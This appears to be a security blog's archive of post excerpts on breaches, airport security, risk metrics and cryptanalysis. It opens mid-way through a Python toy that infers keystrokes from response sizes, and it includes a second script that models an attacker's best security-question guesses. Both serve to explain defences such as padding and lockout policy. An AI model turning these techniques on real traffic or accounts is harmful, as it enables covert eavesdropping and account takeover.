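    return sum(1 for cands in build_oracle(block).values() if len(cands) == 1)


if __name__ == "__main__":
    for block in (1, 64, 128):
        oracle = build_oracle(block)
        print(f"block={block:>3}: sizes={sorted(oracle)} "
              f"unique={uniquely_identified(block)}/{len(SUGGESTIONS)}")
```

Unpadded, every one of the six inputs has its own response size, so one captured record recovers the keystroke. Padding to 64 bytes collapses five of them into one bucket but still singles out the longest, and only a 128-byte bucket hides all six; the general lesson is that padding has to be sized against the whole response distribution, not added per response, which is why the paper calls the fix a challenge.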

 

Smoke, Fire and SSL

Where there’s smoke, there’s fire, goes the adage. And in the case of an allegedly-theoretical exploit outlined in a new paper by Chris Soghoian and Sid Stamm (the compelled certificate creation attack), the presence of a product whose only use is to exploit it probably indicates that there’s more going on than one would like […]

 

Well that didn't take long…

The Guardian has reported the first official incident of misuse of full-body scanner information The police have issued a warning for harassment against an airport worker after he allegedly took a photo of a female colleague as she went through a full-body scanner at Heathrow airport. The incident, which occurred at terminal 5 on 10 […]

 

The New School on Lady Ada Day

Today is Ada Lovelace Day, an international day of blogging to celebrate the achievements of women in technology and science. For Lady Ada Day, Andrew and I want to thank Jessica Goldstein, our editor at Addison Wesley. Without her encouragement, feedback and championing, we never would have published the New School. The first proposal we […]

 

Risks Interconnection Map

The sweet interactive version is here: http://www.weforum.org/documents/riskbrowser2010/risks/# Beyond the cool visualization, I’m really interested in the likelihood/impact of data fraud/data loss over on the left there…

 

Women In Security

Today is Ada Lovelace Day, an international day of blogging to celebrate the achievements of women in technology and science. For Lady Ada Day, I wanted to call out the inspiring work of Aleecia McDonald. In a privacy world full of platonic talk of the value of notice and consent, Aleecia did something very simple: […]

 

Counterpoint: There is demand for security innovation

Over in the Securosis blog, Rich Mogull wrote a post “There is No Market for Security Innovation.” Rich is right that there’s currently no market, but that doesn’t mean there’s no demand. I think there are a couple of inhibitors to the market, but the key one is that transaction costs are kept high by […]

 

I look forward to merging your unique visibility into my own

In “White House Cyber Czar: ‘There Is No Cyberwar’,” Ryan Singel writes: As for his priorities, Schmidt says education, information sharing and better defense systems rank high. That includes efforts to train more security professionals and have the government share more information with the private sector — including the NSA’s defensive side. “One thing we […]

 

Some Chaotic Thoughts on Healthcare

Passage of this bill is too big for my little brain, and therefore I’ll share some small comments. I’m going to leave out the many anecdotes which orient me around stupid red tape conflicts in the US, how much better my health care was in Canada (and how some Canadian friends flew to the US […]

 

Lessons from Robert Maley's Dismissal

A bit over a week ago, it came out that “Pennsylvania fires CISO over RSA talk.” Yesterday Jaikumar Vijayan continued his coverage with an interview, “Fired CISO says his comments never put Penn.’s data at risk.” Now, before I get into the lessons here, I want to point out that Maley is the sort of […]

 

Kids today

A burglar who spent about five hours on a store’s computer after breaking into the business gave police all the clues they needed to track him down. Investigators said the 17-year-old logged into his MySpace account while at Bella Office Furniture and that made it easy for them to find him. He also spent time […]

 
 

Why I'm Skeptical of "Due Diligence" Based Security

Some time back, a friend of mine said “Alex, I like the concept of Risk Management, but it’s a little like the United Nations – Good in concept, horrible in execution”. Recently, a couple of folks have been talking about how security should just be a “diligence” function, that is, we should just prove that […]

 

National Broadband Plan & Data Sharing

I know that reading the new 376 page US “National Broadband Plan” is high on all your priority lists, but section 14 actually has some interestingly New School bits. In particular: Recommendation 14.9: The Executive Branch, in collaboration with relevant regulatory authorities, should develop machine-readable repositories of actionable real-time information concerning cybersecurity threats in a […]

 

'Experts' misfire in trying to shoot down Charney's 'Internet Security Tax' idea

Industry ‘experts’ misfired when they criticized Microsoft’s Scott Charney’s “Internet Security Tax” idea. Q: How many of these ‘experts’ know anything about information economics and public policy responses to negative externalities? A: Zero. Thus, they aren’t really qualified to comment. This is just one small case in the on-going public policy discussions regarding the economics of information security, but given the reaction of the ‘experts’, this was a step backward.

 

Asking the right questions

Schneier points me to lightbluetouchpaper, who note a paper analyzing the potential strength of name-based account security questions, even ignoring research-based attacks, and the findings are good: Analysing our data for security, though, shows that essentially all human-generated names provide poor resistance to guessing. For an attacker looking to make three guesses per personal knowledge […]
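The excerpt frames resistance in terms of an attacker who gets a fixed number of guesses, which is the right frame: a Shannon-entropy figure for an answer space says little about how often three guesses at the most popular answers succeed. As an added example (not the paper’s data or code), the block below computes the usual guessing metrics over a constructed name-frequency table with a few very common answers and a long tail of rare ones. The counts are invented; the shape of the distribution is the point.

```python
"""Guessing metrics for a name-based security-question answer space."""
from __future__ import annotations

import math
from collections import Counter

# Constructed answer distribution (stands in for a census-style frequency table).
# A handful of common answers plus 3,500 singletons; the numbers are invented.
NAME_COUNTS = Counter({
    "smith": 2400, "johnson": 1900, "williams": 1500, "brown": 1200,
    "jones": 1100, "garcia": 900, "miller": 800, "davis": 700,
    **{f"rare{i:04d}": 1 for i in range(3500)},
})


def distribution(counts: Counter) -> list[float]:
    """Answer probabilities, most common first."""
    total = sum(counts.values())
    return sorted((c / total for c in counts.values()), reverse=True)


def shannon_entropy_bits(counts: Counter) -> float:
    """Average-case measure; overstates resistance to a few best guesses."""
    return -sum(p * math.log2(p) for p in distribution(counts))


def min_entropy_bits(counts: Counter) -> float:
    """Worst case for the defender: -log2 of the single most common answer."""
    return -math.log2(distribution(counts)[0])


def beta_success_rate(counts: Counter, beta: int) -> float:
    """Fraction of users compromised by an attacker allowed `beta` guesses
    who spends them on the `beta` most common answers."""
    return sum(distribution(counts)[:beta])


def guesses_for_success(counts: Counter, alpha: float) -> int:
    """Smallest number of guesses that compromises an `alpha` fraction of users."""
    cumulative = 0.0
    for k, p in enumerate(distribution(counts), start=1):
        cumulative += p
        if cumulative >= alpha:
            return k
    return len(counts)


def success_rate_implied_by_shannon(counts: Counter, beta: int) -> float:
    """What `beta` guesses would win if the space were uniform over 2^H answers,
    i.e. the optimistic figure a raw entropy number suggests."""
    return beta / 2 ** shannon_entropy_bits(counts)


if __name__ == "__main__":
    print(f"Shannon entropy : {shannon_entropy_bits(NAME_COUNTS):5.2f} bits")
    print(f"min-entropy     : {min_entropy_bits(NAME_COUNTS):5.2f} bits")
    print(f"3-guess success : {beta_success_rate(NAME_COUNTS, 3):5.1%}")
    print(f"entropy implies : {success_rate_implied_by_shannon(NAME_COUNTS, 3):5.1%}")
    print(f"guesses for 45% : {guesses_for_success(NAME_COUNTS, 0.45)}")
```

On this table the Shannon figure is about six bits, suggesting three guesses should win around 5% of the time, while three guesses at the most common names actually win over 40%. Min-entropy (about 2.5 bits here) and the β-success-rate are the numbers to compare against a lockout policy, not the average-case entropy.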

 

Your credit worthiness in 140 Characters or Less

In “Social networking: Your key to easy credit?,” Eric Sandberg writes: In their quest to identify creditworthy customers, some are tapping into the information you and your friends reveal in the virtual stratosphere. Before calling the privacy police, though, understand how it’s really being used. … To be clear, creditors aren’t accessing the credit reports […]

 

Elsewhere in the New School department

Dennis Fisher wrote “Why Bob Maley’s Firing is Bad for All of Us:” The news that Pennsylvania CISO Bob Maley lost his job for publicly discussing a security incident at last week’s RSA Conference really shouldn’t come as a surprise, but it does. Even for a government agency, this kind of lack of understanding of […]

 

Head of O'Hare Security says it sucks

In the eight months that I was the head of security under the Andolino administration, the commissioner of the busiest airport of the world, depending on who’s taking the survey, the busiest airport in the world, never once had a meeting with the head of security for the busiest airport in the world. Never once. […]

 

Data void: False Positives

A Gartner blog post points out the lack of data reported by vendors or customers regarding the false positive rates for anti-spam solutions. This is part of a general problem in the security industry that is a major obstacle to rational analysis of effectiveness, cost-effectiveness, risk, and the rest.

 

Everybody Should Be Doing Something about InfoSec Research

Previously, Russell wrote “Everybody complains about lack of information security research, but nobody does anything about it.” In that post, he argues for a model where Ideally, this program should be “idea capitalists”, knowing some people and ideas won’t payoff but others will be huge winners. One thing for sure — we shouldn’t focus this […]

 

Krebs on Cyber vs Physical Crooks

In addition, while traditional bank robbers are limited to the amount of money they can physically carry from the scene of the crime, cyber thieves have a seemingly limitless supply of accomplices to help them haul the loot, by hiring so-called money mules to carry the cash for them. I can’t help but notice one […]

 

Everybody complains about lack of information security research, but nobody does anything about it

There has been a disconnect between the primary research sectors, and a lack of appropriate funding in each is leading to decreased technological progress, exposing a huge gap in security that is happily being exploited by cybercriminals. No one seems to be able to mobilize any significant research into breakthrough cyber security solutions. It’s been very frustrating to see so much talk and so little action. This post proposes one possible solution: an Information Security Pioneers Fellowship Program (ISPFP), similar to Gene Spafford’s proposal for an Information Security and Privacy Extended Grant (ISPEG) for academic researchers.

 

Free speech for police

David Bratzer is a police officer in Victoria, British Columbia. He’s a member of “Law Enforcement Against Prohibition,” and was going to address a conference this week. There’s a news video at “VicPD Officer Ordered to Stay Quiet.” In an article in the Huffington Post, “The Muzzling of a Cop” former Seattle Police Chief Norm […]

 

Logging practices

Via a tweet from @WeldPond, I was led to a Daily Mail article which discusses allegations that Facebook founder Mark Zuckerberg “hacked into the accounts of [Harvard] Crimson staff”. Now, I have no idea what happened or didn’t, and I will never have a FB account thanks to my concerns about their approach to privacy, […]

 

Elevation of Privilege: The Threat Modeling Game

In my work blog: “Announcing Elevation of Privilege: The Threat Modeling Game.” After RSA, I’ll have more to say about how it came about, how it helps you and how very new school it is. But if you’re here, you should come get a deck at the Microsoft booth (1500 row).

 

Elevation of Privilege: the Threat Modeling Game

In my work blog: “Announcing Elevation of Privilege: The Threat Modeling Game.” After RSA, I’ll have more to say about how it came about, how it helps you and how it helps more chaos emerge. But if you’re here, you should come get a deck at the Microsoft booth (1500 row).

 

Adam signing today at RSA

I’ll be in the RSA bookstore today at noon, signing books. Please drop on by. PS: I’m now signing Kindles, too.

 

News from RSA: U-Prove

In “U-Prove Minimal Disclosure availability,” Kim Cameron says: This blog is about technology issues, problems, plans for the future, speculative possibilities, long term ideas – all things that should make any self-respecting product marketer with concrete goals and metrics run for the hills! But today, just for once, I’m going to pick up an actual […]

 

Howard Schmidt's talk at RSA

The New York Times has a short article by Markoff, “U.S. to Reveal Rules on Internet Security.” The article focuses first on declassification, and goes on to say: In his first public speaking engagement at the RSA Conference, which is scheduled to open Tuesday, Mr. Schmidt said he would focus on two themes: partnerships and […]

 

The Economist on Breach Disclosure

In “New rules for big data,” the Economist seems to advocate for more disclosure of security problems: The benefits of information security—protecting computer systems and networks—are inherently invisible: if threats have been averted, things work as normal. That means it often gets neglected. One way to deal with that is to disclose more information. A […]

 

Puerto Rico: Biggest Identity Theft ever?

Apparently, the government of Puerto Rico has stolen the identities of something between 1.7 and 4.1 million people: Native Puerto Ricans living outside the island territory are reacting with surprise and confusion after learning their birth certificates will become no good this summer. A law enacted by Puerto Rico in December mainly to combat identity […]

 

Human Error and Incremental Risk

As something of a follow-up to my last post on Aviation Safety, I heard this story about Toyota’s now very public quality concerns on NPR while driving my not-Prius to work last week. Driving a Toyota may seem like a pretty risky idea these days. For weeks now, we’ve been hearing scary stories about sudden […]

 

"We can’t circumvent our way around internet censorship."

That’s the key message of Ethan Zuckerman’s post “Internet Freedom: Beyond Circumvention.” I’ll repeat it: “We can’t circumvent our way around internet censorship.” It’s a long, complex post, and very much worth reading. It starts from the economics of running an ISP that can provide circumvention to all of China, goes to the side effects […]

 

Human Error

In his ongoing role of “person who finds things that I will find interesting,” Adam recently sent me a link to a paper titled “THE HUMAN FACTORS ANALYSIS AND CLASSIFICATION SYSTEM–HFACS,” which discusses the role of people in aviation accidents.  From the abstract: Human error has been implicated in 70 to 80% of all civil […]

 

Symantec State of Security 2010 Report Out

http://www.symantec.com/content/en/us/about/presskits/SES_report_Feb2010.pdf Thanks to big yellow for not making us register!  Oh, and Adam thanks you for not using pie charts…

 

In the "Nothing to Add" department

Nasty psychiatrissstss! Hates them, my precious! They locks uss up in padded cell! They makes uss look at inkblotsss! Tricksy, sly inkblotsss! Nasty Elvish pills burnsss our throat! … Yesss We Hatesss themsss Evil oness yess my preciousss we hatess themsss But They Helpsss us! No they hurtsss usss, hurtsss usss sore! NCBI ROFL: Did […]

 

Can I see some ID?

Or, Security and Privacy are Complementary, Part MCVII: Later, I met one executive who told me that at the same time of my incident at another restaurant owned by the corporation, a server was using stolen credit card numbers by wearing a small camera on him. He would always check ID’s and would quickly flash […]

 

I'm not comfortable with that

The language of Facebook’s iPhone app is fascinating: If you enable this feature, all contacts from your device will be sent to Facebook…Please make sure your friends are comfortable with any use you make of their information. So first off, I don’t consent to you using that feature and providing my mobile phone number to […]

 

Adam & Andy Jaquith: A conversation

In December, Andy Jaquith and I had a fun conversation about info security with Bill Brenner listening in. The transcript is at “Meeting of the Minds,” and the audio is here.

 

Measuring the unmeasurable — inspiration from baseball

The New School approach to information security promotes the idea that we can make better security decisions if we can measure the effectiveness of alternatives.  Critics argue that so much of information security is unmeasurable, especially factors that shape risk, that quantitative approaches are futile.  In my opinion, that is just a critique of our current methods […]

 

Happy Valentine's Day!

They say that Y equals m-x plus b (well, when you remove the uncertainty). So let me reveal a secret confession: You’re the solution to my least squares obsession. stolen from the applied statistics blog

 

Open Security Foundation Looking for Advisors

Open Security Foundation – Advisory Board – Call for Nominations: The Open Security Foundation (OSF) is an internationally recognized 501(c)(3) non-profit public organization seeking senior leaders capable of providing broad-based perspective on information security, business management and fundraising to volunteer for an Advisory Board. The Advisory Board will provide insight and guidance when developing future […]

 

Saltzer, Schroeder, and Star Wars

When this blog was new, I did a series of posts on “The Security Principles of Saltzer and Schroeder,” illustrated with scenes from Star Wars. When I migrated the blog, the archive page was re-ordered, and I’ve just taken a few minutes to clean that up. The easiest to read version is “Security Principles of […]

 

My Sweet Lord, this is a Melancholy story

There’s an elephant of a story over at the New York Times, “Musician Apologizes for Advertising Track That Upset the White Stripes.” It’s all about this guy who wrote a song that ended up sounding an awful lot like a song that this other guy had written. And how this other guy (that being Mr. […]

 

Podcast on ISM3

Last week, I spoke at the Open Group meeting here in Seattle, and then recorded a podcast with Dana Gardner, Jim Hietala and Vicente Aceituno about ISM3 Brings Greater Standardization to Security Measurement Across Enterprise IT (audio) or you can read the transcript. It was fun, and the podcast is short and to the point. […]

 
 

Does It Matter If The APT Is "New"?

As best as I can describe the characteristics of the threat agents that would fit the label of APT, that threat community is very, very real.  It’s been around forever (someone mentioned first use of the term being 1993 or something) – we dealt with threat agents you would describe as “APT” at MicroSolved when […]

 

Applying Utility Functions To Humans?

From Less Wrong:  http://lesswrong.com/lw/1qk/applying_utility_functions_to_humans_considered/ I’m at The Open Group Security Forum this week in Seattle, speaking about risk and stuff.  Adam gave a great talk about Security: From Art to Science.  One recurring theme all week was the need to borrow from disciplines outside of Comp Sci and Engineering.   When we think about the […]

 

Off with their heads!

In a private conversation, someone said “has anyone in company‘s IT staff been fired for letting people use that software?” I did some searching for “firing offenses” and I found a bunch of interesting random things. I’d like to quote one, “How can I fire a non-performer in today’s environment:” You may have some […]

 

V-22 Osprey Metrics

Metrics seem to be yet another way in which Angry Bear noticed that the V-22 Osprey program has hidden from its failure to deliver on its promises: Generally, mission capability runs 20% higher than availability, but availability is hidden on new stuff, while shouted about on older stuff, because there would be severe embarrassment if you […]

 

Security Blogger Awards

We’re honored to be nominated for “Most Entertaining Security Blog” at this year’s “2010 Social Security Blogger Awards.” Now, in a fair fight, we have no hope against Hoff’s BJJ, Mike Rothman’s incitefulness, Jack Daniel’s cynicism, or Erin’s sociability. But, really, there’s no reason for this to be a fair fight. So we’re asking our […]

 

The Best Question In Information Security

Ian Grigg seems to have kicked off a micro-trend with “The most magical question of all — why are so many bright people fooling themselves about the science in information security?.” Gunnar Peterson followed up with “Most Important Security Question: Cui Bono?” Both of these are really good questions, but I’m going to take issue […]

 

'Don't Ask, Don't Tell in Davos' — Act 3 in the Google-China affair

There is no better illustration of the institutional and social taboos surrounding data breach reporting and information security in general than the Google-Adobe-China affair. While the Big Thinkers at the World Economic Forum discussed every other idea under the sun, this one was taboo.

 

That's Some Serious Precision, or Watch Out, She's Gonna Go All Decimal!

So last night the family and I sat down and watched a little TV together for the first time in ages.  We happened to settle on the X-Games on ESPN, purely because they were showing a sport that I can only describe as Artistic Snowmobile Jumping.  Basically, these guys get on snowmobiles, jump them in […]

 

Today in Tyrannicide History

On January 30th, 1649, Charles I was beheaded for treason. He refused to enter a defense, asserting that as monarch, he was the law, and no court could try him. That same defense is raised today by Milošević, Hussein and other tyrants. The story of how John Cooke built his arguments against that claim is […]

 

Privacy and Security are Complimentary, Part MCIV

Privacy and security often complement each other in ways that are hard to notice. It’s much easier to present privacy and security as “in tension” or as a dependency. In this occasional series, we present ways in which they complement each other. In this issue, the Financial Times reports that “Hackers target friends of Google […]

 

Quote For Today

Their judgment was based on wishful thinking rather than on sound calculation of probabilities; for the usual thing among men, is when they want something, they will, without any reflection, leave that to hope; which they will employ the full force of reasoning in rejecting what they find unpalatable. — Thucydides

 

Help EFF Measure Browser Uniqueness

The EFF is doing some measurement of browser uniqueness and privacy. It takes ten seconds. Before you go, why not estimate what fraction of users have the same transmitted/discoverable browser settings as you, and then check your accuracy at https://panopticlick.eff.org. Or start at http://www.eff.org/deeplinks/2010/01/help-eff-research-web-browser-tracking for a bit more detail.

 

Text Size (and testing)

Thank you for all the feedback in email & comments. Testing a new font size, feedback is again invited and welcome.

 
 

Shameless Self-Promotion

Hi, If you like risk, risk management, and metrics, I’ll be giving an online presentation you might want to see tomorrow at 2 EST: Gleaning Risk Management Data From Incidents http://www.brighttalk.com/webcasts/8093/attend

 

Migration

After more than 5 years, nearly 3,300 posts, and 6,300 comments on Movable Type, we’re migrating the blog to WordPress on a new host. Please let us know if I broke something. This is the new machine. Photo: Face the World with a Peaceful Mind, by Ting Hay.

 
 

Emergent Planetary Detection via Gravitational Lensing

The CBC Quirks and Quarks podcast on “The 10% Solar System Solution” is a really interesting 9 minutes with Scott Gaudi on how to find small planets far away: We have to rely on nature to give us the microlensing events. That means we can’t actually pick and choose which stars to look at, and […]

 

People are People, Too!

Apparently, corporations and unions can now spend unlimited funds on campaign advertisements. I’m hopeful that soon the Supreme Court will recognize that people are people too, and have the same free speech rights as corporations. Maybe, too, the Court will recognize that Congress may not limit the right of people to freely associate, and perhaps […]

 

The Face of FUD

A vivid image of Fear, Uncertainty, and Doubt (FUD), from an email promotion by NetWitness.

 

Why I Don't Like CRISC, Day Two

Yesterday, I offered up a little challenge to suggest that we aren’t ready for a certification around understanding information risk.  Today I want to mention why I think this CRISCy stuff is dangerous. What if how we’re approaching the subject is wrong?  What if it’s mostly wrong and horribly expensive? I’m going to offer that […]

 

Why I Don't Like CRISC

Recently, ISACA announced the CRISC certification.  There are many reasons I don’t like this, but to avoid ranting and in the interest of getting to the point, I’ll start with the main reason I’m uneasy about the CRISC certification: We’re not mature enough for a certification in risk management. Don’t believe me?  Good for you, […]

 

Doing threat intelligence right

To improve threat intelligence, it’s most important to address the flaws in how we interpret and use the intelligence that we already gather. Intelligence analysts are human beings, and many of their failures follow from intuitive ways of thinking that, while allowing the human mind to cut through reams of confusing information, often end up misleading us.

 

The Dog That Didn't Bark at Google

So it’s been all over everywhere that “uber-sophisticated” hackers walked all over Google’s internal network. Took their source, looked at email interception tools, etc. What’s most fascinating to me is that: Google’s customers don’t seem to be fleeing. Google stock fell approximately 4% on the news they were hacked, while the market was down 2% […]

 

Does it include a launchpad?

The New York Times is reporting that there’s a “Deep Discount on Space Shuttles,” they’re down to $28.8 million. But even more exciting than getting one of the 3 surviving monstrosities is that the main engines are free: As for the space shuttle main engines, those are now free. NASA advertised them in December […]

 

Wondering about Phenomenon

Yesterday, Russell posted in our amusements category about the avoidance of data sharing. He gives an anecdote about “you,” presumably a security professional, talking to executives about sharing security information. I’d like to offer an alternate anecdote. Executive: “So we got the audit report in, and it doesn’t look great. I was talking to some […]

 
 

Blogs worth reading, an occasional series

Dan Lohrmann’s “Why Do Security Professionals Fail?” So what works and what doesn’t seem to make much difference in getting consistently positive results? My answers will probably surprise you. I’m not the first person to ask this question. Conventional wisdom says we need more training and staff with more security certifications. Others say we need […]

 

Terrorism Links and quotes

Ed Hasbrouck on “Lessons from the case of the man who set his underpants on fire” A Canadian woman who’s been through the new process is too scared to fly. “Woman, 85, ‘terrified’ after airport search.” Peter Arnett reported “‘It became necessary to destroy the town to save it,’ a TSA major said today. He […]

 

Another Week, Another GSM Cipher Bites the Dust

Orr Dunkelman, Nathan Keller, and Adi Shamir have released a paper showing that they’ve broken KASUMI, the cipher used in encrypting 3G GSM communications. KASUMI is also known as A5/3, which is confusing because it’s only been a week since breaks on A5/1, a completely different cipher, were publicized. So if you’re wondering if this […]

 

Ignorance of the 4 new laws a day is no excuse

The lead of this story caught my eye: (CNN) — Legislatures in all 50 states, the District of Columbia, Guam, the Virgin Islands and Puerto Rico met in 2009, leading to the enactment of 40,697 laws, many of which take effect January 1. That’s an average of 753 laws passed in each of those jurisdictions. […]

 
 

Is Quantified Security a Weak Hypothesis?

I’ve recently read “Quantified Security is a Weak Hypothesis,” a paper which Vilhelm Verendel published at NSPW09. We’re discussing it in email, and I think it deserves some broader attention. My initial note was along these lines: I think the paper’s key hypothesis “security can be correctly represented with quantitative information” is overly broad. Can […]

 

768-bit RSA key factored

The paper is here. The very sane opening paragraph is: On December 12, 2009, we factored the 768-bit, 232-digit number RSA-768 by the number field sieve (NFS, [19]). The number RSA-768 was taken from the now obsolete RSA Challenge list [37] as a representative 768-bit RSA modulus (cf. [36]). This result is a record for […]

 

Comments on the Verizon DBIR Supplemental Report

On December 9th, Verizon released a supplement to their 2009 Data Breach Investigations Report. One might optimistically think of this as volume 2, #2 in the series. A good deal of praise has already been forthcoming, and I’m generally impressed with the report, and very glad it’s available and free. But in this post, I’m […]

 

Things Darwin Didn't Say

There’s a great line attributed to Darwin: “It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is most adaptable to change.” The trouble is, he never said it. Background here. Original sources are important and fun.

 

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!

 

How not to do security, Drone Video Edition

This is probably considered to be “old news” by many, but I’m high-latency in my news at the moment. Much was made of the fact that the US Military’s enemies are now eavesdropping on the video feeds from US Drones on the battlefield using cheaply available commercial technology.  But it’s OK, because according to the […]

 

A Way Forward

Since writing the New School, I’ve been thinking a lot about why it seems so hard to get there. There are two elements which Andrew and I didn’t explicitly write about which I think are tremendously important. Both of them have to do with the psychology of information security. The first is that security experts are […]

 

SearchSecurity Top Stories of 2009 Podcast

A few weeks ago, I joined the SearchSecurity team (Mike Mimoso, Rob Westervelt and Eric Parizo) to discuss the top cybersecurity stories of 2009. It was fun, and part 1 is now available for a listen: part 1 (22:58), part 2 is still to come.

 

The Spectacle of Street View

Street with a View is an art project in Google Street View, with a variety of scenes enacted for the camera, either to be discovered in Street View, or discovered via the project web site. via David Fraser.

 

Comment Spam

We’ve been flooded with comment spam. I’ve added one of those annoying captcha things that don’t work, and a mandatory comment confirmation page. Please let me know if you have trouble. Blogname @ gmail.com, or adam @ blogname.com I think comments are working, but most won’t show up immediately. I’m digging into more effective solutions.

 
 

To the amazing chaos of the 2010s

I expect that there will be senseless acts of violence, planes destroyed and perhaps a city attacked with effective biological weapons. There will be crazy people with more power than we want to comprehend. There will be a billion malnourished, undereducated folks whose lives don’t improve. The first world will continue to be saddled with […]

 

Airplane Terrorism, Data-Driven Edition

I’m just off a flight from London back to the United States and I’m hesitant to attempt to think while jet-lagged.  I’ll have some more thoughts and first-hand observations once my head clears, however. In the meantime, Nate Silver has broken down the risk of terror attacks on airplanes so I don’t have to.  Summarizing […]

 

The New School of Air Travel Security?

As I simmer with anger over how TSA is subpoenaing bloggers, it occurs to me that the state of airline security is very similar to that of information security in some important ways: failures are rare; partial failures are generally secret; actual failures are analyzed in secret; procedures are secret; procedures seem bizarre and arbitrary […]

 

What the FBI Was Doing on Beethoven's Birthday

This is unfair, but I can’t resist. Nine days before we found out again that PETN is hard to detonate, the FBI was keeping us safe: FBI FINALLY MAKES AN ARREST OVER ‘WOLVERINE’ LEAK The FBI has announced the capture of an individual connected with the leak of 20th Century Fox’s “X-Men Origins: Wolverine.” … […]

 

Abdulmutallab/Flight 253 Airline Terror links

Air Canada is canceling US flights because of security. (Thanks, @nselby!) The New York Times reports that “Britain Rejected Visa Renewal for Suspect.” NPR reported that the State Department may have raised some sort of flag, but I don’t have a link. ABC is reporting that two of the “al Qaeda Leaders Behind Northwest Flight […]

 

Observations on the Christmas Bomber

Since there’s been so much discussion about the Christmas Bomber, I want to avoid going over the same ground everyone else is. So as much as I can, I’m going to try to stick to lightly-treaded ground. This is a failure for the terrorists. A big one. Think about it; put yourself on the other […]

 

Abdulmutallab/Flight 253 Airline Terror links

The Economist “The latest on Northwest flight 253:” “the people who run America’s airport security apparatus appear to have gone insane” and “This is the absolute worst sort of security theatre: inconvenient, absurd, and, crucially, ineffective.” Business Travel Coalition, via Dave Farber and Esther Dyson, “Aviation Security After Detroit:” “It is welcome news that President […]

 

76% Organic

The back does explain that it’s 76% organic petite sirah, and 24% non-organic grapes. I just thought it was a pretty funny thing to put on the front label, and wonder which consumers are going to be more likely to buy it, knowing that it’s 76% organic.

 
 

New Restrictions: No Using Electronic Devices for the Last Hour

Apparently, in the wake of thousands of deaths from idiots paying more attention to GPS, cell phones, GameBoys, iPods and other such electronic devices, TSA has announced a ban on all use of such devices for the last hour of your commute. No, just kidding. Apparently, they may be imposing new secret restrictions on use […]

 

Brian W Kernighan & Dennis M Ritchie & HP Lovecraft

I never heard of C Recursion till the day before I saw it for the first and– so far– last time. They told me the steam train was the thing to take to Arkham; and it was only at the station ticket-office, when I demurred at the high fare, that I learned about C Recursion. […]

 
 

Burning News: Gavle Goat

USA Today informs us that: Despite surveillance cameras and heavy security, vandals in a small Swedish town have burned down a giant Yuletide straw goat for the 24th time since 1966, the Associated Press reports. Here at Emergent Chaos, we’re deeply concerned that the goat ended up with neither privacy nor even temporary safety. Photo: […]

 

An Open Letter to the New Cyber-Security Czar

Dear Howard, Congratulations on the new job! Even as a cynic, I’m surprised at just how fast the knives have come out, declaring that you’ll get nothing done. I suppose that low expectations are easy to exceed. We both know you didn’t take this job because you expected it to be easy or fun, but […]

 
 

Biggest Breach Ever

Precision blogging gets the scoop: You’re probably talking about this terrible security disaster already: the largest database leak ever. Arweena, a spokes-elf for Santa Claus, admitted a few hours ago that the database posted at WikiLeaks yesterday is indeed the comprehensive 2009 list of which kids have been naughty, and which were nice. The source […]

 

NotObvious On Heartland

I posted this also to the securitymetrics.org mailing list.  Sorry if discussing in multiple venues ticks you off. The Not Obvious blog has an interesting write up on the Heartland Breach and impact.  From the blog post: “Heartland has had to pay other fines to Visa and MasterCard, but the total of $12.6 million they […]

 

Open Thread

I’ll give you a topic, eh, no I won’t. Have at it, but not at each other.

 

For Blog/Twitter Conversation: Can You Defend "GRC"?

Longtime readers know that I’m not the biggest fan of GRC as it is “practiced” today.  I believe G & C are subservient to risk management. So let me offer you this statement to chew on: “A metric for Governance is only useful inasmuch as it describes an ability to manage risk” True or False, […]

 
 

St. Cajetan's Revenge

For some time, I’ve watched the War on Bottled Water with amusement. I don’t disagree with figuring out how to reduce waste, and so on and so forth, but the railing against bottled water per se struck me as not thought out very well. The major reason for my thinking is that I never heard […]

 

Top Security Stories of the Year?

On Wednesday, I’ll be joining a podcast to discuss “top security stories of the year.” I have a couple in mind, but I’d love to hear your nominations. What are the most important things which have happened in information security in the last year? (I posted this on Emergent Chaos, but forgot to post it […]

 

We Take Your Privacy Seriously

So after BNY Mellon dropped a tape with my social security number and those of millions of my closest neighbors, they bought me a one year subscription to Experian’s “Triple Alert” credit monitoring service. Today, I got email telling me that there was new information, and so I went to login. Boy, am I glad […]

 

Data Not Assertions

There have already been a ton of posts out there about the Verizon DBIR Supplement that came out yesterday, so I’m not going to dive into the details, but I wanted to highlight this quick discussion from twitter yesterday that really sums up the value of the supplement and similar reports: georgevhulme: I’m glad we […]

 

Huh, who knew?

We have a comments feed. I suppose we should add that to somewhere sane. In the meanwhile, you should click here. We have smart commenters, and what they say is usually worthwhile.

 

Emerging threat: Social Botnets

We think of botnets as networks of computing devices slaved to some command & control system. But what about human-in-the-loop botnets, where humans are either participants or prime actors? I’m coining this label: “social botnets”. Recent example: “Health Insurers Caught Paying Facebook Gamers To Oppose Reform Bill”.

 

Top Security Stories of the Year?

Next week, I’ll be joining a podcast to discuss “top security stories of the year.” I have a couple in mind, but I’d love to hear your nominations. What are the most important things which have happened in information security in the last year?

 

NEW: Verizon 2009 DBIR Supplement

The supplement provides case studies, involving anonymous Verizon clients, that detail some of the tools and methods hackers used to compromise the more than 285 million sensitive records that were breached in 90 forensic cases Verizon handled last year.

 

Monkeys krak-oo krak-oo

According to “Campbell’s Monkeys Use Affixation to Alter Call Meaning:” We found that male alarm calls are composed of an acoustically variable stem, which can be followed by an acoustically invariable suffix. Using long-term observations and predator simulation experiments, we show that suffixation in this species functions to broaden the calls’ meaning by transforming a […]

 

Sweden: An Interesting Demographic Case Study In Internet Fraud

(quietly, wistfully singing “Yesterday” by the Beatles) From my favorite Swedish Infosec Blog, Crowmoor.se. I don’t speak Swedish, so I couldn’t really read the fine article they linked to.  Do go read their blog post, I’ll wait here. Back?  Great.  Here are my thoughts on those numbers: SWEDISH FRAUD STATISTICS RELEASED The World Bank estimates […]

 

Mandatory web client scripts analogous to CDOs

The widespread and often mandatory use of client scripts in websites (e.g., JavaScript) is like CDOs [Collateralized Debt Obligations]. They both are designed by others with little interest in your security, they leverage your resources for their benefit, they are opaque, complex, nearly impossible to audit, and therefore untrustworthy.

 

Time to update your threat model to include "friendly fire"

If you work in InfoSec outside of the military, you may be thinking that “offensive cyber capability” doesn’t apply to you. Don’t be so sure. I think it’s worth adding to the threat model for every organization. New “hacking gadgets” could be put in the hands of ordinary soldiers, turning them into the equivalent of “script kiddies”. But what if the potential target knows that such attacks may be coming? They could set up a deceptive defense and redirect the attack to another network.

 

TSA Security Operating Procedures

